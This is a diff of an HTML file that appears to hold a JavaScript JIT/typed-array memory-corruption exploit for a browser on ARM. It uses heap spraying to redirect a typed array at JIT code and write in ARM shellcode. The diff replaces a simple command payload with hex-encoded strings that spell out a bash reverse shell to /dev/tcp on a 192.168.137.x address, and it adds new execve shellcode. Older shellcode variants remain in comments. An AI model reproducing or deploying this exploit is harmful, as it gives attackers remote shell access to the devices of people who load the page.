--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start7");
+alert("start8");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -159,13 +159,32 @@ spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
 spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
 spray[spray_index][typedarray_index+0x40/4]=0x6E69622F;
 spray[spray_index][typedarray_index+0x44/4]=0x00736c2F;
-spray[spray_index][typedarray_index+0x48/4]=0x00696d61;
-spray[spray_index][typedarray_index+0x4c/4]=0x0;
-spray[spray_index][typedarray_index+0x50/4]=0x0;
+spray[spray_index][typedarray_index+0x60/4]=0x500000a0;
+spray[spray_index][typedarray_index+0x64/4]=0x500000b0;
+spray[spray_index][typedarray_index+0x68/4]=0x500000c0;
+spray[spray_index][typedarray_index+0x6c/4]=0x500000d0;
+spray[spray_index][typedarray_index+0x70/4]=0x500000f0;
+spray[spray_index][typedarray_index+0x74/4]=0x0;
+spray[spray_index][typedarray_index+0x80/4]=0x0;
+spray[spray_index][typedarray_index+0x84/4]=0x0;
+spray[spray_index][typedarray_index+0xa0/4]=0x68736162;//bash
+spray[spray_index][typedarray_index+0xa4/4]=0x0;
+spray[spray_index][typedarray_index+0xb0/4]=0x0000692d;//-i
+spray[spray_index][typedarray_index+0xc0/4]=0x0000263e;//>&
+spray[spray_index][typedarray_index+0xd0/4]=0x7665642F;
+spray[spray_index][typedarray_index+0xd4/4]=0x7063742F;
+spray[spray_index][typedarray_index+0xd8/4]=0x3239312F;
+spray[spray_index][typedarray_index+0xdc/4]=0x3836312E;
+spray[spray_index][typedarray_index+0xe0/4]=0x3733312E;
+spray[spray_index][typedarray_index+0xe4/4]=0x3330312E;
+spray[spray_index][typedarray_index+0xe8/4]=0x3837372F;
+spray[spray_index][typedarray_index+0xec/4]=0x00000038;
+spray[spray_index][typedarray_index+0xf0/4]=0x31263E30;//0>&1
+spray[spray_index][typedarray_index+0xf4/4]=0x0;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
-var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x24\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50";
+var shellcode="\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x20\x00\x9f\xe5\x20\x10\x9f\xe5\x20\x20\x9f\xe5\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x60\x00\x00\x50\x80\x00\x00\x50";
     //open read sh//"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x44\x00\x9f\xe5\x00\x10\xa0\xe3\x00\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x34\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x2c\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x20\x10\x9f\xe5\x00\x00\x81\xe5\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50\x08\x02\x00\x50"
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x3c\x00\x9f\xe5\x00\x10\xa0\xe3\x04\x20\xa0\xe3\x05\x70\xa0\xe3\x00\x00\x00\xef\x2c\x10\x9f\xe5\x00\x00\x81\xe5\x00\x00\xa0\xe1\x24\x10\x9f\xe5\x10\x20\xa0\xe3\x03\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1\x40\x00\x00\x50\x00\x02\x00\x50\x00\x01\x00\x50";
     //"\x0e\x20\xa0\xe1\x10\x20\x04\xe5\x00\x00\xa0\xe3\x00\x10\xa0\xe3\x00\x20\xa0\xe3\xc7\x70\xa0\xe3\x00\x00\x00\xef\x00\x10\xa0\xe3\x10\x20\x14\xe5\x28\x40\x14\xe5\x02\xe0\xa0\xe1\x1e\xff\x2f\xe1";    //"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
